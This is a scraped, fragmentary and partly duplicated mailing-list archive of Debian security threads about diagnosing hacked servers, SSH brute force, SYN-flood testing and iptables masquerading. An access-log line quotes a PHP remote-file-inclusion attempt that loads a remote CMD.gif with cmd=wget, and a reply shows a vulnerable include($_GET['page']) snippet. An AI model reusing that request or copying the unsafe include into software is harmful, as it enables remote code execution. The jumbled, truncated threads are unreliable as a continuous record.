On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote:
> Hello!
>
> >http://jesusch.de/~jesusch/tmp/access.log
>
> There are many log entries with "something=http://"; style
> pattern. These are common attack methods against default configured
> servers with poorly written applications.
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193
Hi Fuzzums,
Fuzzums schrieb:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/conne
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p
Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Hello!
http://jesusch.de/~jesusch/tmp/access.log
There are many log entries with "something=http://"; style
pattern. These are common attack methods against default configured
servers with poorly written applications. Many of these rely on
register_globals=on php.ini setting. Turn it off first
I've putted access.log online with the following cutted off:
grep -v "Googlebot/2.1" access.log.1| grep -v ^87.106.31.224|grep -v
gallery|grep -v "Yahoo! Slurp"|grep -vi svn |grep -v mediawiki |grep -v
"favicon.ico"
http://jesusch.de/~jesusch/tmp/access.log
at that mentioned time someone at l
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (propably any php-stuff)
was/is vulnerable.
All I've found so far where these entries in my apache2 error-log.
http://jesusch
Hi list,
My sarge box box was recently hacked by some script kiddy who installed
an irc-dcc-filserver on it :/
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (propably any
php-stuff) was/is vulnerable.
All I've found so
---Message d'origine-
De : Paolo Pedaletti [mailto:[EMAIL PROTECTED]
Envoyé : vendredi 22 juillet 2005 11:32
À : debian-security@lists.debian.org
Objet : Re: Help needed - server hacked twice in three days (and I don't
think I'm a newbie)
ciao Thomas Sjögren,
> . Better pas
Karsten Dambekalns wrote:
Jul 19 03:07:30 ds217-115-141-24 sshd[27011]: Illegal user anton from
217.115.205.101
# whois 217.115.205.101
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools
ciao Thomas Sjögren,
> . Better passwords
like using libpam-cracklib and dcredit,ucredit,lcredit,ocredit options
and...
- send syslog (better syslog-ng) entries to a log-server
- chroot LAMP
- run nessus against the server
- run snort on server
- ... (what else?)
If he had enough time, he
I don't know what type of php applications you are using with apache, but
with php I would recommend to use something like 'modsecurity' for apache,
configuring modsecurity to your needs and have apache chrooted. For
iptables, something like firehol can help you to setup iptables quickly.
--
-J
In gmane.linux.debian.devel.security, you wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7. How did he gain root access?
Are you sure it's 2.6.7 and not 2.6.8, the Sarge kernel?
Anyway, there are several unfixed local privilege escalation security
issues i
Hi.
On Friday 22 July 2005 00:00, Rob Sims wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machien that runs
> > ssh, apache, php, exim and nothing else (all as of Debian 3.1)?
>
> Didn't one of your logs show ov
Hi.
On Friday 22 July 2005 00:14, Ulf Harnhammar wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machien that runs
> > ssh, apache,
> ^^
> >
Goswin von Brederlow <[EMAIL PROTECTED]> writes:
> Karsten Dambekalns <[EMAIL PROTECTED]> writes:
>
>> Hi.
>>
>> On Thursday 21 July 2005 20:31, Andras Got wrote:
>>> The users, the ones the machines was hacked, were they existing users on
>>> the machine?
>>
>> I don't know which user account got
Hi.
On Thursday 21 July 2005 22:52, Goswin von Brederlow wrote:
> > I don't know which user account got hacked, if this was what has
> > happened.
>
> Did you check the last lock? Maybe the attacker didn't remove the
> traces there.
He ran the mentioned logclean binary, the content of wtmp is not
On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> Another question came up here. Is it really likely to be a SSH brute force
> break in, or could the attacker have been able to log in some other way? What
> is currently possible in that respect on a machien that runs ssh, apac
Hi.
On Thursday 21 July 2005 22:39, Andras Got wrote:
> It's important to know whether it's an existing account, imho.
Yes. It is, because if it's not, it's not about cracking passwords, but
something else. Ugh.
> >>Do you use AllowUsers or AllowGroup?
> >
> > No. I hate to admit I didn't know
On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> Another question came up here. Is it really likely to be a SSH brute force
> break in, or could the attacker have been able to log in some other way? What
> is currently possible in that respect on a machien that runs ssh, apac
Hi.
Thanks for your reply!
Another question came up here. Is it really likely to be a SSH brute force
break in, or could the attacker have been able to log in some other way? What
is currently possible in that respect on a machien that runs ssh, apache,
php, exim and nothing else (all as of De
Karsten Dambekalns <[EMAIL PROTECTED]> writes:
> Hi.
>
> On Thursday 21 July 2005 20:31, Andras Got wrote:
>> The users, the ones the machines was hacked, were they existing users on
>> the machine?
>
> I don't know which user account got hacked, if this was what has happened.
Did you check the l
On Thu, Jul 21, 2005 at 08:17:38PM +0200, Karsten Dambekalns wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7.
They are both old kernels, compile your own and apply suitable patches.
Grsecurity is one, and it doesn't need any particular configuration.
>
Hi,
Karsten Dambekalns írta:
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
The users, the ones the machines was hacked, were they existing users on
the machine?
I don't know which user account got hacked, if this was what has happened.
It's important to know whether it's an exis
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
> The users, the ones the machines was hacked, were they existing users on
> the machine?
I don't know which user account got hacked, if this was what has happened.
> Do you use AllowUsers or AllowGroup?
No. I hate to admit I didn't know tha
Hi.
A server I take care of has been hacked twice in the last three days. It is
running Debian GNU/Linux, obviously. I ask you for advice on how this
happened, what happened, and what to do to avoid this.
The first hack happened on Tuesday, the machine was runnign Debian 3.0 plus
patches *but*
Hello people,
I am having problems with connecting my RedHat Linux box to the internet. I cannot seem to be able to even ping any other machine on the network. I do
> telnet localhost. I get
>localhost: Host name lookup failure.
I tried >telnet 127.0.0.1.
It waits for some time and then says:
t
Hello people,
I am having problems with connecting my RedHat Linux box to the internet. I cannot seem to be able to even ping any other machine on the network. I do
> telnet localhost. I get
>localhost: Host name lookup failure.
I tried >telnet 127.0.0.1.
It waits for some time and then says:
t
On Mon, Feb 09, 2004 at 08:21:15PM -0800, Jeff wrote:
> suhail, 2004-Feb-09 15:15 -0800:
[snip]
> > Now how do i actually find out if the packets are being dropped.
> > i.e where shud I chk my system log files to see the dropped packets
> > ... I mean which file is it n under which dir ..
>
> The
On Mon, Feb 09, 2004 at 08:21:15PM -0800, Jeff wrote:
> suhail, 2004-Feb-09 15:15 -0800:
[snip]
> > Now how do i actually find out if the packets are being dropped.
> > i.e where shud I chk my system log files to see the dropped packets
> > ... I mean which file is it n under which dir ..
>
> The
suhail, 2004-Feb-09 15:15 -0800:
> Hello,
> I need to know how can a firewall be tested against a SYN Flooder. I
> have the SYN flooder program and also configured my firewall. My
> IPtables script against the SYN packets is the usual :
>
> > $IPTABLES -N syn-flood
> > $IPTABLES -A syn-flood -m li
suhail, 2004-Feb-09 15:15 -0800:
> Hello,
> I need to know how can a firewall be tested against a SYN Flooder. I
> have the SYN flooder program and also configured my firewall. My
> IPtables script against the SYN packets is the usual :
>
> > $IPTABLES -N syn-flood
> > $IPTABLES -A syn-flood -m li
Hello,I need to know how can a firewall be tested against a SYN Flooder. I have the SYN flooder program and also configured my firewall. My IPtables script against the SYN packets is the usual : > $IPTABLES -N syn-flood> $IPTABLES -A syn-flood -m limit --limit 50/s --limit-burst 104 -j RETURN> $I
Hello,I need to know how can a firewall be tested against a SYN Flooder. I have the SYN flooder program and also configured my firewall. My IPtables script against the SYN packets is the usual : > $IPTABLES -N syn-flood> $IPTABLES -A syn-flood -m limit --limit 50/s --limit-burst 104 -j RETURN> $I
11 Jul, 2001, Luc MAIGNAN wrote in " Help needed on snort "]
> Hi,
>
> I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
> given on the web site. Has anyone an example to let me understand what to do ?
>
> Best regards
>
>
> --
&
Hi,
I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
given on the web site. Has anyone an example to let me understand what to do ?
Best regards
11 Jul, 2001, Luc MAIGNAN wrote in " Help needed on snort "]
> Hi,
>
> I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
> given on the web site. Has anyone an example to let me understand what to do ?
>
> Best regards
>
>
> --
&
Hi,
I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
given on the web site. Has anyone an example to let me understand what to do ?
Best regards
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0
you need to set it to eth0 not ppp0
- Original Message -
From: Luc MAIGNAN <[EMAIL PROTECTED]>
To:
Cc: ; <[EMAIL PROTECTED]@lists.debian.org>
Sent: Monday, June 04, 2001 7:39 AM
Subject: Help needed on MASQUERADE
> HI all,
>
> I have an internet connection on
you need to set it to eth0 not ppp0
- Original Message -
From: Luc MAIGNAN <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: ; <[EMAIL PROTECTED]@lists.debian.org>
Sent: Monday, June 04, 2001 7:39 AM
Subject: Help needed on MASQUERADE
> HI all,
>
> I have an
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
This wouldn't work at all. You have to write
iptables -t nat -I POSTROUTING -s 192.168.0.0/24 -o ppp0 -j MASQUARADE
echo 1>/proc/sys/net/ipv4/ip_forward
--
[EMAIL PROTECTED]
ROBERT MAG
you need to send it through eth0 not ppp0
[EMAIL PROTECTED] wrote:
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation on my network succeeded to ping both eth0
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
> A workstation on my network succeeded to ping both eth0 and eth1, but didn't
> succeed to go out of my network to reach the i
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -
HI all,
I have an internet connection on eth0 (10.0.0.1) and a private network
connection on eth1 (192.168.0.1).
I put the masquerade configuration on a kernel 2.4.4 :
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation on
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
This wouldn't work at all. You have to write
iptables -t nat -I POSTROUTING -s 192.168.0.0/24 -o ppp0 -j MASQUARADE
echo 1>/proc/sys/net/ipv4/ip_forward
--
[EMAIL PROTECTED]
ROBERT MA
you need to send it through eth0 not ppp0
[EMAIL PROTECTED] wrote:
>On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
>
>> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
>> echo 1>/proc/sys/net/ipv4/ip_forward
>>
>>A workstation on my network succeeded to ping both
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
> A workstation on my network succeeded to ping both eth0 and eth1, but didn't
> succeed to go out of my network to reach the
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0
HI all,
I have an internet connection on eth0 (10.0.0.1) and a private network
connection on eth1 (192.168.0.1).
I put the masquerade configuration on a kernel 2.4.4 :
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation o
53 matches
Mail list logo
